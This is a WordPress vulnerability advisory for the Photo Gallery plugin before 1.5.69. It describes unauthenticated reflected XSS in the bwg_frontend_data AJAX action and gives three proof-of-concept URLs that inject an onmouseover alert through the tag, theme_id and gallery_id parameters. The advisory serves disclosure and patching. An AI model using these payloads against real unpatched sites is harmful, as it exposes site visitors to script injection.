Photo Gallery < 1.5.69 - Multiple Reflected Cross-Site Scripting (XSS)

2021-04-19T00:00:00
ID WPVDB-ID:CFB982B2-8B6D-4345-B3AB-3D2B130B873A
Type wpvulndb
Reporter wpvulndb
Modified 2021-04-27T07:02:40

Description

The plugin was vulnerable to Reflected Cross-Site Scripting (XSS) issues via the gallery_id, tag, album_id and theme_id GET parameters passed to the bwg_frontend_data AJAX action (available to both unauthenticated and authenticated users)

PoC

https://example.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&tag;=%22%20onmouseover=alert(1)%3E https://example.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&theme;_id=%22%20onmouseover=alert(1)%3E https://example.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&gallery;_id=1%22%20onmouseover=alert(1)%3E